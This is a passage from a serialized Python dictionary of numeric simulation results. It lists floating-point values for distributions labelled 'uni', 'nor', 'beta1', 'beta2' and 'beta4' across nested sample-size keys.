0.05929595778075081, 'beta2': 0.13114280729155686, 'beta4': 0.04768802094469193}, 500: {'uni': 0.07196269990769555, 'nor': 0.10929050520651495, 'beta1': 0.07283579022785935, 'beta2': 0.13763586545366968, 'beta4': 0.060027142657854}, 400: {'uni': 0.08054788114980349, 'nor': 0.11648685006536474, 'beta1': 0.0811659726275793, 'beta2': 0.14360472688257275, 'beta4': 0.06804198089690716}, 300: {'uni': 0.09360446147057411, 'nor': 0.12347797475561295, 'beta1': 0.09391365693051856, 'beta2': 0.15084726685668082, 'beta4': 0.07971992088255381}, 200: {'uni': 0.11420590046780266, 'nor': 0.13996925144507733, 'beta1': 0.11318748651513358, 'beta2': 0.1649173148462807, 'beta4': 0.10100464440514964}, 150: {'uni': 0.13159721869668134, 'nor': 0.15543417245376623, 'beta1': 0.1306662632283953, 'beta2': 0.17863248019784544, 'beta4': 0.11926356604886618}, 100: {'uni': 0.1616085474743723, 'nor': 0.18126496559108407, 'beta1': 0.16180591430502922, 'beta2': 0.20079768282663685, 'beta4': 0.14662232668007058}, 75: {'uni': 0.18466397256542888, 'nor': 0.20167396401497723, 'beta1': 0.18454565366419512, 'beta2': 0.22144937952843802, 'beta4': 0.1723673372282205}, 50: {'uni': 0.22429367090067337, 'nor': 0.2421981518299573, 'beta1': 0.22627305994598435, 'beta2': 0.25417001184524735, 'beta4': 0.21615315140042368}, 30: {'uni': 0.2891984285711773, 'nor': 0.3022022225666101, 'beta1': 0.2885857727546917, 'beta2': 0.31488071890675523, 'beta4': 0.27946891056788803}, 20: {'uni': 0.35272562205198627, 'nor': 0.3597248755608644, 'beta1': 0.34988508357633813, 'beta2': 0.37359776285196444, 'beta4': 0.3452123858638153}, 10: {'uni': 0.4934504641167673, 'nor': 0.4953893325003678, 'beta1': 0.49326648601757545, 'beta2': 0.5048531792897072, 'beta4': 0.48425541230404723}}, 150: {1000: {'uni': 0.051578990681795306, 'nor': 0.10587724278324923, 'beta1': 0.05100434131700521, 'beta2': 0.1385651893710681, 'beta4': 0.040131066622810074}, 750: {'uni': 0.05964212868791385, 'nor': 0.11070421199591629, 'beta1': 0.058951783674372704, 
'beta2': 0.1401604284675425, 'beta4': 0.04709391177274086}, 500: {'uni': 0.07278161439913988, 'nor': 0.12078841684699831, 'beta1': 0.07292441980479603, 'beta2': 0.14450764888197143, 'beta4': 0.058999750381320826}, 400: {'uni': 0.08088169280004709, 'nor': 0.12433378065418932, 'beta1': 0.08132095020607566, 'beta2': 0.15222740175561678, 'beta4': 0.06647480909025247}, 300: {'uni': 0.0939218287454483, 'nor': 0.13477079040381174, 'beta1': 0.09374450977190885, 'beta2': 0.15925231238657545, 'beta4': 0.07809357504147704}, 200: {'uni': 0.11376771084448467, 'nor': 0.14849656103329123, 'beta1': 0.11448673216899263, 'beta2': 0.17267349109969787, 'beta4': 0.09768020272133693}, 150: {'uni': 0.13248417636554644, 'nor': 0.16487086808018317, 'beta1': 0.13201540731601635, 'beta2': 0.18463196235548684, 'beta4': 0.11564332215144385}, 100: {'uni': 0.15986880516145718, 'nor': 0.18568769522330097, 'beta1': 0.16083695049744096, 'beta2': 0.20763142518129513, 'beta4': 0.14518253285735372}, 75: {'uni': 0.18453989535605683, 'nor': 0.20888765477064086, 'beta1': 0.18449616472594121, 'beta2': 0.2273477267710795, 'beta4': 0.1717298602845287}, 50: {'uni': 0.225005258500509, 'nor': 0.2457096370841649, 'beta1': 0.2261275447013404, 'beta2': 0.2614753286995815, 'beta4': 0.21363887611658533}, 30: {'uni': 0.2895467650368521, 'nor': 0.30561459985547096, 'beta1': 0.28870673052245394, 'beta2': 0.3182687898914055, 'beta4': 0.2785792145404429}, 20: {'uni': 0.3510013380043752, 'nor': 0.3689369050495814, 'beta1': 0.35376596345288086, 'beta2': 0.3753745534011983, 'beta4': 0.34145606872993056}, 10: {'uni': 0.4879912533176197, 'nor': 0.49642038735952065, 'beta1': 0.48769549189795697, 'beta2': 0.5050788225647467, 'beta4': 0.4785566786480819}}, 100: {1000: {'uni': 0.05191039332270719, 'nor': 0.1245351360241278, 'beta1': 0.050997006206302875, 'beta2': 0.1460504259615869, 'beta4': 0.039905064803095525}, 750: {'uni': 0.05998871346519452, 'nor': 0.1294606683925581, 'beta1': 0.05847700732727823, 'beta2': 
0.15021805913043595, 'beta4': 0.04601974795368319}, 500: {'uni': 0.07341973515609257, 'nor': 0.13531370556475342, 'beta1': 0.07268776551364053, 'beta2': 0.15390577989276166, 'beta4': 0.05694920670041542}, 400: {'uni': 0.08067103236103346, 'nor': 0.14321047014928123, 'beta1': 0.08067289579950143, 'beta2': 0.15985350854382507, 'beta4': 0.06537605030613047}, 300: {'uni': 0.09438397276573021, 'nor': 0.14904746557912396, 'beta1': 0.09398651936888375, 'beta2': 0.16721766000932792, 'beta4': 0.07618184832746211}, 200: {'uni': 0.11527057686285336, 'nor': 0.1642522242508767, 'beta1': 0.11389959855243442, 'beta2': 0.18023752667719684, 'beta4': 0.09672312219072954}, 150: {'uni': 0.13216312596618518, 'nor': 0.1751857316995788, 'beta1': 0.1302080010184946, 'beta2': 0.1927573270242654, 'beta4': 0.11238481899540864}, 100: {'uni': 0.16076877833678727, 'nor': 0.19975581943363707, 'beta1': 0.16079488576960266, 'beta2': 0.20995618985866715, 'beta4': 0.14127998845587303}, 75: {'uni': 0.18434632621362634, 'nor': 0.21848200560175463, 'beta1': 0.18642816894352734, 'beta2': 0.23061939766314457, 'beta4': 0.16533631802523197}, 50: {'uni': 0.22724922024813737, 'nor': 0.2584378792366021, 'beta1': 0.22695557193281157, 'beta2': 0.2675887560653766, 'beta4': 0.20740264516587753}, 30: {'uni': 0.2918722908611385, 'nor': 0.3155005347993203, 'beta1': 0.2926574234664835, 'beta2': 0.3225067701718885, 'beta4': 0.27375474423769725}, 20: {'uni': 0.3454149675998711, 'nor': 0.37444691882619846, 'beta1': 0.3534455881933011, 'beta2': 0.37908898284769055, 'beta4': 0.33782534459856733}, 10: {'uni': 0.48995308583601727, 'nor': 0.5057924764345054, 'beta1': 0.48712627773712436, 'beta2': 0.509289943720692, 'beta4': 0.4760256361246777}}, 75: {1000: {'uni': 0.05263806893207712, 'nor': 0.1426387862890096, 'beta1': 0.050861516064434786, 'beta2': 0.1550912428095914, 'beta4': 0.03942562584827963}, 750: {'uni': 0.05987895965521034, 'nor': 0.14543562438841662, 'beta1': 0.05843122916552068, 'beta2': 0.1621832342719166, 
'beta4': 0.04641508440087805}, 500: {'uni': 0.0729716053027788, 'nor': 0.14981406322703128, 'beta1': 0.07136667899438129, 'beta2': 0.16497360040986309, 'beta4': 0.05736466968785836}, 400: {'uni': 0.08175178171124547, 'nor': 0.15594408152690709, 'beta1': 0.08094487541872952, 'beta2': 0.17052351554071665, 'beta4': 0.0643906104219426}, 300: {'uni': 0.09174467790257729, 'nor': 0.16325422501166353, 'beta1': 0.09381129166957458, 'beta2': 0.17484070317567046, 'beta4': 0.07488233712902187}, 200: {'uni': 0.11347575789530223, 'nor': 0.17663300299982598, 'beta1': 0.11326725293489726, 'beta2': 0.1883129177850832, 'beta4': 0.0942089295423881}, 150: {'uni': 0.131120018205924, 'nor': 0.19093489533419694, 'beta1': 0.13205247166475537, 'beta2': 0.19914811519378778, 'beta4': 0.11204039761886475}, 100: {'uni': 0.16082564475037464, 'nor': 0.20856290260278498, 'beta1': 0.1625220254469636, 'beta2': 0.22253364361870465, 'beta4': 0.13842685894102613}, 75: {'uni': 0.18769569670626118, 'nor': 0.22923558297249835, 'beta1': 0.18448259911628095, 'beta2': 0.23782557049636, 'beta4': 0.16392283350600595}, 50: {'uni': 0.22331353175762125, 'nor': 0.26715148642337594, 'beta1': 0.22668241788193566, 'beta2': 0.26824852802663934, 'beta4': 0.20334391006072833}, 30: {'uni': 0.289473862453717, 'nor': 0.3214887737505831, 'beta1': 0.2875485914729527, 'beta2': 0.32630978396412536, 'beta4': 0.2697829912702217}, 20: {'uni': 0.3511642946869532, 'nor': 0.3751483594090778, 'beta1': 0.352409931529952, 'beta2': 0.3784846745898291, 'beta4': 0.33540408314790005}, 10: {'uni': 0.488706375026184, 'nor': 0.5055985987947458, 'beta1': 0.4929217350189299, 'beta2': 0.5091039256808894, 'beta4': 0.4781596967150431}}, 50: {1000: {'uni': 0.054187095918339256, 'nor': 0.16627808992474102, 'beta1': 0.05074852615107739, 'beta2': 0.17412185904693311, 'beta4': 0.039691505151292106}, 750: {'uni': 0.062058115432295474, 'nor': 0.17238046742698188, 'beta1': 0.059084035023102, 'beta2': 0.17597952934137606, 'beta4': 0.04541331900508322}, 
500: {'uni': 0.07423220817161519, 'nor': 0.1792687852250358, 'beta1': 0.07197857057706736, 'beta2': 0.1818195777041135, 'beta4': 0.05569462226316452}, 400: {'uni': 0.08254206840442069, 'nor': 0.1825333888879272, 'beta1': 0.08099479940703191, 'beta2': 0.18984048447922675, 'beta4': 0.06357941522010713}, 300: {'uni': 0.09474363323614166, 'nor': 0.18834315888900854, 'beta1': 0.09343612898219089, 'beta2': 0.1924669867698795, 'beta4': 0.07309401794651404}, 200: {'uni': 0.11623368179709986, 'nor': 0.20107102192718945, 'beta1': 0.1147080452043604, 'beta2': 0.20330128778291234, 'beta4': 0.09144934593281676}, 150: {'uni': 0.13323158697545257, 'nor': 0.2113741612304923, 'beta1': 0.13089326840146875, 'beta2': 0.21101409732714788, 'beta4': 0.1080905839738153}, 100: {'uni': 0.1610409156149188, 'nor': 0.23200918860179387, 'beta1': 0.16001862287729518, 'beta2': 0.23225218169591122, 'beta4': 0.13330220075686566}, 75: {'uni': 0.18275303987938896, 'nor': 0.2503116552370775, 'beta1': 0.18535594744801204, 'beta2': 0.2435558750806069, 'beta4': 0.15726325930804558}, 50: {'uni': 0.2246149371985376, 'nor': 0.2833867880515266, 'beta1': 0.22456825644221368, 'beta2': 0.27550623451671474, 'beta4': 0.1978109061797627}, 30: {'uni': 0.2872878605199388, 'nor': 0.3386232243962164, 'beta1': 0.28579575210477914, 'beta2': 0.33471410391675205, 'beta4': 0.26584890073856127}, 20: {'uni': 0.3523359671395369, 'nor': 0.3883193259633752, 'beta1': 0.34980199502356346, 'beta2': 0.38521307572061386, 'beta4': 0.32550253808599006}, 10: {'uni': 0.48543686550596693, 'nor': 0.5182694839209849, 'beta1': 0.49221988171682085, 'beta2': 0.5153967620456474, 'beta4': 0.4700594688479634}}, 30: {1000: {'uni': 0.058918924239352466, 'nor': 0.21297337163268276, 'beta1': 0.0518167432973049, 'beta2': 0.195446267914975, 'beta4': 0.03908638506448431}, 750: {'uni': 0.06572796327401753, 'nor': 0.21595057482420588, 'beta1': 0.059259512312420104, 'beta2': 0.19755323997975416, 'beta4': 0.045197433532028874}, 500: {'uni': 
0.07686236514630335, 'nor': 0.22226563318166248, 'beta1': 0.07177928002902467, 'beta2': 0.2056526292300077, 'beta4': 0.05493149389715696}, 400: {'uni': 0.08465975831568184, 'nor': 0.2252684454523387, 'beta1': 0.08123930027330767, 'beta2': 0.2099099100664712, 'beta4': 0.06217418123201823}, 300: {'uni': 0.09651070474378282, 'nor': 0.2300730633949879, 'beta1': 0.09323619984546516, 'beta2': 0.2120833703149353, 'beta4': 0.07312418047556249}, 200: {'uni': 0.11605617135066404, 'nor': 0.2431502125103765, 'beta1': 0.11353867501894094, 'beta2': 0.21682074894377878, 'beta4': 0.08933031413363546}, 150: {'uni': 0.13410472341858543, 'nor': 0.24725518547910333, 'beta1': 0.1318999891275866, 'beta2': 0.22942799747160325, 'beta4': 0.10272810181706044}, 100: {'uni': 0.16196955748999547, 'nor': 0.2700012320341486, 'beta1': 0.15871486988261296, 'beta2': 0.24514818382512593, 'beta4': 0.13010131517540321}, 75: {'uni': 0.1835418878236575, 'nor': 0.28467491610667683, 'beta1': 0.18546450563511369, 'beta2': 0.26290322403314065, 'beta4': 0.15276528672305534}, 50: {'uni': 0.22509609698193117, 'nor': 0.3142329116082755, 'beta1': 0.22663224055326758, 'beta2': 0.2919325149774068, 'beta4': 0.18996462242195666}, 30: {'uni': 0.2897752445348868, 'nor': 0.359326156047137, 'beta1': 0.29020063665136886, 'beta2': 0.34273751996321067, 'beta4': 0.2529174520482719}, 20: {'uni': 0.344005648632975, 'nor': 0.42004384529396105, 'beta1': 0.34658611138046264, 'beta2': 0.3902673253680207, 'beta4': 0.31692923991569927}, 10: {'uni': 0.4837000884491306, 'nor': 0.5316468101838533, 'beta1': 0.48249080675172323, 'beta2': 0.5194341288716998, 'beta4': 0.4603664888921414}}, 20: {1000: {'uni': 0.06597487107762767, 'nor': 0.26293245683028, 'beta1': 0.05120820169191942, 'beta2': 0.22017115245446095, 'beta4': 0.038916881153397975}, 750: {'uni': 0.07269217456814536, 'nor': 0.2667557058726879, 'beta1': 0.059583644657734885, 'beta2': 0.2217993564160058, 'beta4': 0.04508243513408289}, 500: {'uni': 0.08323814797112672, 'nor': 
0.2728795944957957, 'beta1': 0.07257265729126575, 'beta2': 0.2282291849514998, 'beta4': 0.055068233755242446}, 400: {'uni': 0.09072350595679135, 'nor': 0.2723668419179453, 'beta1': 0.08056174054012066, 'beta2': 0.22597367362057608, 'beta4': 0.06169261835040951}, 300: {'uni': 0.10083188986577823, 'nor': 0.27712117006626796, 'beta1': 0.09318059105121618, 'beta2': 0.23326141016132318, 'beta4': 0.07091172628182563}, 200: {'uni': 0.12110756732550038, 'nor': 0.2855441269934709, 'beta1': 0.1157486267208615, 'beta2': 0.23795719725720738, 'beta4': 0.08927441431005056}, 150: {'uni': 0.13598733501466506, 'nor': 0.2907323977734544, 'beta1': 0.13109115777861102, 'beta2': 0.25318192125603234, 'beta4': 0.10332852211836979}, 100: {'uni': 0.1639431522658722, 'nor': 0.31152417983746605, 'beta1': 0.16155024590107747, 'beta2': 0.262103768140855, 'beta4': 0.12609462698530394}, 75: {'uni': 0.18685165128081893, 'nor': 0.3254693717012144, 'beta1': 0.18397251726711683, 'beta2': 0.27915696455084993, 'beta4': 0.14785181380565982}, 50: {'uni': 0.22761062573955604, 'nor': 0.3522320739163892, 'beta1': 0.2256099922364685, 'beta2': 0.30883291813380065, 'beta4': 0.18365089973024573}, 30: {'uni': 0.289203483511623, 'nor': 0.4011670663050516, 'beta1': 0.2891477181429253, 'beta2': 0.35472219797014837, 'beta4': 0.24745951418710105}, 20: {'uni': 0.34667459614575846, 'nor': 0.44850723188809377, 'beta1': 0.35113197277916386, 'beta2': 0.4044647849108889, 'beta4': 0.3126967400538809}, 10: {'uni': 0.48476115016520405, 'nor': 0.554406017917817, 'beta1': 0.4817528515392736, 'beta2': 0.5313493222964868, 'beta4': 0.4483656416548137}}, 10: {1000: {'uni': 0.09689632012426586, 'nor': 0.37891222572877614, 'beta1': 0.09112144529033561, 'beta2': 0.2586988400624156, 'beta4': 0.03900835588583823}, 750: {'uni': 0.10064795489220457, 'nor': 0.383188375068864, 'beta1': 0.09112850229049962, 'beta2': 0.2640286285324004, 'beta4': 0.04502182335240068}, 500: {'uni': 0.10802210321588324, 'nor': 0.3884962880934829, 'beta1': 
0.0911721599997744, 'beta2': 0.27079265676023156, 'beta4': 0.05453895677656284}, 400: {'uni': 0.11304279449008725, 'nor': 0.3889920925008913, 'beta1': 0.0912685747102537, 'beta2': 0.26870553332669633, 'beta4': 0.0616433432574133}, 300: {'uni': 0.12154400796026772, 'nor': 0.39206198235198325, 'beta1': 0.09483352592096467, 'beta2': 0.2724084181642078, 'beta4': 0.07113409099304874}, 200: {'uni': 0.1347088080476393, 'nor': 0.3989961151096316, 'beta1': 0.11465623517387658, 'beta2': 0.2801925598985867, 'beta4': 0.08778892448680453}, 150: {'uni': 0.14950650016574885, 'nor': 0.4074020676124349, 'beta1': 0.1319362581048737, 'beta2': 0.2882295441811764, 'beta4': 0.09979505237411807}, 100: {'uni': 0.1746199496093277, 'nor': 0.41995987192595596, 'beta1': 0.1606353579518667, 'beta2': 0.3046266455964683, 'beta4': 0.12499057927159085}, 75: {'uni': 0.1963173328176369, 'nor': 0.4305939349118369, 'beta1': 0.1853892160990983, 'beta2': 0.3141345572002111, 'beta4': 0.14329993044048847}, 50: {'uni': 0.23406933928651003, 'nor': 0.4528491146162036, 'beta1': 0.22664378023198406, 'beta2': 0.3345469784583225, 'beta4': 0.17784420010893143}, 30: {'uni': 0.29324923220629134, 'nor': 0.4874432234123751, 'beta1': 0.2893385819235859, 'beta2': 0.3762716610461486, 'beta4': 0.2340649401769095}, 20: {'uni': 0.35290644687931416, 'nor': 0.5339309604641884, 'beta1': 0.3494325720267195, 'beta2': 0.42149057999190237, 'beta4': 0.29349793334316515}, 10: {'uni': 0.4819570489345161, 'nor': 0.621282121995842, 'beta1': 0.48228312064803025, 'beta2': 0.531072925087128, 'beta4': 0.42676946077577815}}}, 0.05: {1000: {1000: {'uni': 0.04250873596535332, 'nor': 0.05211322056354162, 'beta1': 0.04306205955872783, 'beta2': 0.08035999046629705, 'beta4': 0.03797796698498185}, 750: {'uni': 0.04939044076050647, 'nor': 0.057928759168451305, 'beta1': 0.04956386512094496, 'beta2': 0.08255880301550844, 'beta4': 0.04460825923337863}, 500: {'uni': 0.060593693593500864, 'nor': 0.06752114560687372, 'beta1': 0.060391364928257474, 
'beta2': 0.08816209252857421, 'beta4': 0.05607127534968437}, 400: {'uni': 0.0673055881110432, 'nor': 0.07339531978449776, 'beta1': 0.06742981404562332, 'beta2': 0.09222999610749227, 'beta4': 0.06293590114601089}, 300: {'uni': 0.07829316510351103, 'nor': 0.08373775958480117, 'beta1': 0.07775258426053894, 'beta2': 0.10010817811684236, 'beta4': 0.07394283107208066}, 200: {'uni': 0.09529933382323597, 'nor': 0.10000749443187817, 'beta1': 0.09514079230112737, 'beta2': 0.11393345537368338, 'beta4': 0.0917178764665584}, 150: {'uni': 0.1095050668662032, 'nor': 0.1131765255844498, 'beta1': 0.10961338251417468, 'beta2': 0.12625941180627626, 'beta4': 0.10701383836580813}, 100: {'uni': 0.13504293819410917, 'nor': 0.13789756284368515, 'beta1': 0.13448261128725092, 'beta2': 0.1469163714586994, 'beta4': 0.13105762405283972}, 75: {'uni': 0.15512998752952264, 'nor': 0.15736947708421162, 'beta1': 0.15460254067269846, 'beta2': 0.16654377290913044, 'beta4': 0.1511024290565549}, 50: {'uni': 0.18856009448236644, 'nor': 0.1906997936343151, 'beta1': 0.1884576993592476, 'beta2': 0.1982428759858742, 'beta4': 0.18622204644381843}, 30: {'uni': 0.2398807672306324, 'nor': 0.24412240717703027, 'beta1': 0.24053994368488707, 'beta2': 0.24870244801951652, 'beta4': 0.23887135097093648}, 20: {'uni': 0.29368464372283687, 'nor': 0.2955974928774556, 'beta1': 0.2925421511499017, 'beta2': 0.29823721632962963, 'beta4': 0.2937927014266898}, 10: {'uni': 0.40809844072326357, 'nor': 0.40905711558389374, 'beta1': 0.4074293842569355, 'beta2': 0.41442818653088903, 'beta4': 0.4102533723801786}}, 750: {1000: {'uni': 0.04313132347462212, 'nor': 0.055054467531027274, 'beta1': 0.042903624792836825, 'beta2': 0.08085753121993888, 'beta4': 0.037165583736955776}, 750: {'uni': 0.04934405850774021, 'nor': 0.06012658528358911, 'beta1': 0.04926360659177581, 'beta2': 0.08292295419216378, 'beta4': 0.04421364295003938}, 500: {'uni': 0.060341804714815095, 'nor': 0.07033647349548888, 'beta1': 0.060558717006613694, 'beta2': 
0.08863522371969174, 'beta4': 0.05517938622481133}, 400: {'uni': 0.06747724189757476, 'nor': 0.07601553392118676, 'beta1': 0.06753738114806768, 'beta2': 0.09286935098393112, 'beta4': 0.06258866218729964}, 300: {'uni': 0.0779234041757913, 'nor': 0.08581112098260912, 'beta1': 0.07752436380641886, 'beta2': 0.10025969540588678, 'beta4': 0.0727070225966075}, 200: {'uni': 0.09529011628998052, 'nor': 0.10157134239672405, 'beta1': 0.09532196270657745, 'beta2': 0.114717619457614, 'beta4': 0.09084936265846794}, 150: {'uni': 0.10929839951597176, 'nor': 0.11416074257244094, 'beta1': 0.10964416703357704, 'beta2': 0.1261134555516631, 'beta4': 0.10586630629141039}, 100: {'uni': 0.13402537604739173, 'nor': 0.13946500057705635, 'beta1': 0.13339315942045915, 'beta2': 0.14779247908517917, 'beta4': 0.12987399411308242}, 75: {'uni': 0.15491927659856863, 'nor': 0.15726063343810553, 'beta1': 0.15463569652056147, 'beta2': 0.1679004949850389, 'beta4': 0.1524841664459506}, 50: {'uni': 0.18831823725744598, 'nor': 0.19163748416973814, 'beta1': 0.1884166302028113, 'beta2': 0.19811874878971442, 'beta4': 0.18759940893926474}, 30: {'uni': 0.24249816383380124, 'nor': 0.2448871814993652, 'beta1': 0.24185014536823451, 'beta2': 0.24980128317227762, 'beta4': 0.2421287830978741}, 20: {'uni': 0.2940118546518854, 'nor': 0.29331856753560476, 'beta1': 0.29360254728317475, 'beta2': 0.30182924197426564, 'beta4': 0.29353502143027616}, 10: {'uni': 0.4087141031810262, 'nor': 0.41170613228789243, 'beta1': 0.4094888928024222, 'beta2': 0.41617469535239165, 'beta4': 0.4111278779658915}}, 500: {1000: {'uni': 0.0429345704660003, 'nor': 0.05932234329262365, 'beta1': 0.042727156109620246, 'beta2': 0.08510210997179135, 'beta4': 0.036257982752805895}, 750: {'uni': 0.049265441580142344, 'nor': 0.06453072581186886, 'beta1': 0.04952462754419623, 'beta2': 0.0880626740533288, 'beta4': 0.04274970287381094}, 500: {'uni': 0.06051345692735122, 'nor': 0.07405810203028496, 'beta1': 0.06013137064686658, 'beta2': 0.09405433515075423, 
'beta4': 0.05362451219159059}, 400: {'uni': 0.06726638579663013, 'nor': 0.0793534053635837, 'beta1': 0.06761300772776771, 'beta2': 0.0996414553379194, 'beta4': 0.061074275253972965}, 300: {'uni': 0.07752111447176113, 'nor': 0.08853014421612171, 'beta1': 0.07790127912387818, 'beta2': 0.10591589294909354, 'beta4': 0.07149101529018864}, 200: {'uni': 0.09553432289253411, 'nor': 0.10474513086458981, 'beta1': 0.09491138965654433, 'beta2': 0.11924936822193555, 'beta4': 0.089970363011452}, 150: {'uni': 0.11049256971537569, 'nor': 0.11834670194031227, 'beta1': 0.11055795759911412, 'beta2': 0.13284580636545373, 'beta4': 0.1045099293615413}, 100: {'uni': 0.1325888031595155, 'nor': 0.1416642277128064, 'beta1': 0.13487031887436052, 'beta2': 0.15320832506486431, 'beta4': 0.12989554029630124}, 75: {'uni': 0.15407104188981624, 'nor': 0.1599128393935123, 'beta1': 0.15374710784163467, 'beta2': 0.16941911839219415, 'beta4': 0.150389415793519}, 50: {'uni': 0.18908047311103032, 'nor': 0.19373367790298657, 'beta1': 0.18889964131492282, 'beta2': 0.20132986679665088, 'beta4': 0.1846732957113127}, 30: {'uni': 0.24226077908740745, 'nor': 0.24727230642152115, 'beta1': 0.24238358313543917, 'beta2': 0.2513661790960438, 'beta4': 0.23977316063110243}, 20: {'uni': 0.2932302698568148, 'nor': 0.2947506771756141, 'beta1': 0.2938361058917397, 'beta2': 0.30338566870485817, 'beta4': 0.2894081827795897}, 10: {'uni': 0.4095412142044333, 'nor': 0.41582272767182626, 'beta1': 0.4091307634899183, 'beta2': 0.41139636575315974, 'beta4': 0.4078258054114057}}, 400: {1000: {'uni': 0.04255614948733477, 'nor': 0.06271520295830779, 'beta1': 0.042499298590381596, 'beta2': 0.08456650823704548, 'beta4': 0.03580234989921294}, 750: {'uni': 0.04937518706328403, 'nor': 0.06777109574937312, 'beta1': 0.049367906001651085, 'beta2': 0.08730333067407448, 'beta4': 0.04221923686249307}, 500: {'uni': 0.06056747910036231, 'nor': 0.07722766386556512, 'beta1': 0.060303960376819954, 'beta2': 0.09289270953205328, 'beta4': 
0.05248883908484214}, 400: {'uni': 0.06728484592171763, 'nor': 0.08236276990821306, 'beta1': 0.06746558979046141, 'beta2': 0.09825313200635855, 'beta4': 0.06025406262496252}, 300: {'uni': 0.07820323026110898, 'nor': 0.09073559074460608, 'beta1': 0.07821541358546946, 'beta2': 0.10636367292497817, 'beta4': 0.0707215219370873}, 200: {'uni': 0.09539601064885839, 'nor': 0.10556303670070322, 'beta1': 0.09561582053237683, 'beta2': 0.12180562887877411, 'beta4': 0.08801801823329147}, 150: {'uni': 0.10936714369824918, 'nor': 0.11926537223910565, 'beta1': 0.10969157845228705, 'beta2': 0.13244557387181255, 'beta4': 0.10341522850743123}, 100: {'uni': 0.13354393257412983, 'nor': 0.1423512660895025, 'beta1': 0.1349214446210324, 'beta2': 0.15303126855995564, 'beta4': 0.12836102685714074}, 75: {'uni': 0.1539128338395579, 'nor': 0.16324678205317678, 'beta1': 0.15405133046909722, 'beta2': 0.17098592920893618, 'beta4': 0.14957593956825316}, 50: {'uni': 0.18775635329386392, 'nor': 0.1937191005204043, 'beta1': 0.1884271730141419, 'beta2': 0.20435458644695162, 'beta4': 0.1843870264363775}, 30: {'uni': 0.24284157129386047, 'nor': 0.24629860436826123, 'beta1': 0.2408640216307077, 'beta2': 0.25171500005639674, 'beta4': 0.23632331131142947}, 20: {'uni': 0.294735259283024, 'nor': 0.3000105461174386, 'beta1': 0.29458072221349885, 'beta2': 0.3014785462051059, 'beta4': 0.2909045447121572}, 10: {'uni': 0.4103919628714764, 'nor': 0.41225052464658113, 'beta1': 0.41060821792134156, 'beta2': 0.4163793146371585, 'beta4': 0.40742898042098596}}, 300: {1000: {'uni': 0.042894438722122286, 'nor': 0.06804466454865021, 'beta1': 0.042975744332918175, 'beta2': 0.0888244060704032, 'beta4': 0.03506422723776037}, 750: {'uni': 0.04935072830414078, 'nor': 0.0725923011358739, 'beta1': 0.04961504811513984, 'beta2': 0.09140206098548131, 'beta4': 0.04167378331875227}, 500: {'uni': 0.06083268710478407, 'nor': 0.08079774711138776, 'beta1': 0.060462958380593346, 'beta2': 0.09864492613316656, 'beta4': 0.05224950308205284}, 
400: {'uni': 0.06740667823442481, 'nor': 0.08662549045486634, 'beta1': 0.06812433004180829, 'beta2': 0.10449231525526514, 'beta4': 0.05889668522599231}, 300: {'uni': 0.07759043263185894, 'nor': 0.09466518723563278, 'beta1': 0.07761370429428577, 'beta2': 0.11256171095061174, 'beta4': 0.06901393087520213}, 200: {'uni': 0.09501186068000178, 'nor': 0.11045546634746517, 'beta1': 0.09545154794009353, 'beta2': 0.12529152669670096, 'beta4': 0.08590491171623238}, 150: {'uni': 0.10913769973038989, 'nor': 0.12308354696458895, 'beta1': 0.10968689772848039, 'beta2': 0.1357602716808839, 'beta4': 0.1014492424455633}, 100: {'uni': 0.13555693310048833, 'nor': 0.14414239978154153, 'beta1': 0.13509394899970356, 'beta2': 0.15724894818388713, 'beta4': 0.12712742588054968}, 75: {'uni': 0.1528796701368813, 'nor': 0.16337025975562974, 'beta1': 0.15343029335140113, 'beta2': 0.17613550383491916, 'beta4': 0.14800406699526014}, 50: {'uni': 0.18792883570862817, 'nor': 0.19765009586613413, 'beta1': 0.18912520193521853, 'beta2': 0.2052442637463902, 'beta4': 0.1817694823681486}, 30: {'uni': 0.24126343910617895, 'nor': 0.24731827586722788, 'beta1': 0.24270517877017284, 'beta2': 0.2557802201638789, 'beta4': 0.23627972110713036}, 20: {'uni': 0.2926059984655144, 'nor': 0.2986919482722732, 'beta1': 0.2923500002958017, 'beta2': 0.30460634421517385, 'beta4': 0.28973301373812854}, 10: {'uni': 0.4102473624031447, 'nor': 0.415040095717406, 'beta1': 0.4086610684156582, 'beta2': 0.41242893849078294, 'beta4': 0.40337056089025664}}, 200: {1000: {'uni': 0.04292620281905324, 'nor': 0.07789366288788169, 'beta1': 0.042909295701843875, 'beta2': 0.09598401017764835, 'beta4': 0.03444818222651283}, 750: {'uni': 0.049116893075300094, 'nor': 0.08192589013572071, 'beta1': 0.049261303877093376, 'beta2': 0.09942309864768661, 'beta4': 0.04066451451600811}, 500: {'uni': 0.06050980125495031, 'nor': 0.08870178975680876, 'beta1': 0.06019971884940478, 'beta2': 0.10568112520914552, 'beta4': 0.050818961275074126}, 400: {'uni': 
0.06739439830856109, 'nor': 0.09366639653726616, 'beta1': 0.06764647221850328, 'beta2': 0.11327801797692638, 'beta4': 0.05737622556223043}, 300: {'uni': 0.07777244883862433, 'nor': 0.10218475647374542, 'beta1': 0.07789235265143774, 'beta2': 0.11913850063835685, 'beta4': 0.0674525332548831}, 200: {'uni': 0.09502704520860905, 'nor': 0.11604045896624948, 'beta1': 0.09510463516896728, 'beta2': 0.13172961091169733, 'beta4': 0.0847162185101194}, 150: {'uni': 0.11016636440205546, 'nor': 0.12811765905677236, 'beta1': 0.10970368873875014, 'beta2': 0.14331145199787, 'beta4': 0.09995453264910176}, 100: {'uni': 0.13445642653897671, 'nor': 0.1497382854380087, 'beta1': 0.13348683808905348, 'beta2': 0.16329669247250422, 'beta4': 0.12465846974308342}, 75: {'uni': 0.15419888978141394, 'nor': 0.16923478439093248, 'beta1': 0.1534954671086292, 'beta2': 0.17909152766875147, 'beta4': 0.14538034559889523}, 50: {'uni': 0.1867393471217101, 'nor': 0.19994040891868026, 'beta1': 0.18704772643881146, 'beta2': 0.20860701598862752, 'beta4': 0.18028390140578754}, 30: {'uni': 0.24085839007149673, 'nor': 0.25196638732921794, 'beta1': 0.2416028527023132, 'beta2': 0.258985786530043, 'beta4': 0.23484197182299332}, 20: {'uni': 0.2938289434391539, 'nor': 0.30183924391245415, 'beta1': 0.2929710538077763, 'beta2': 0.30847428056222437, 'beta4': 0.2887648891428266}, 10: {'uni': 0.409241850795313, 'nor': 0.41624360452445025, 'beta1': 0.4073016819406742, 'beta2': 0.41919073368911525, 'beta4': 0.4050765267408517}}, 150: {1000: {'uni': 0.04291723660518407, 'nor': 0.08563558848858943, 'beta1': 0.042846891281439425, 'beta2': 0.10223899504388945, 'beta4': 0.03395439572798897}, 750: {'uni': 0.04950013649203988, 'nor': 0.08925938870000594, 'beta1': 0.04965224665621104, 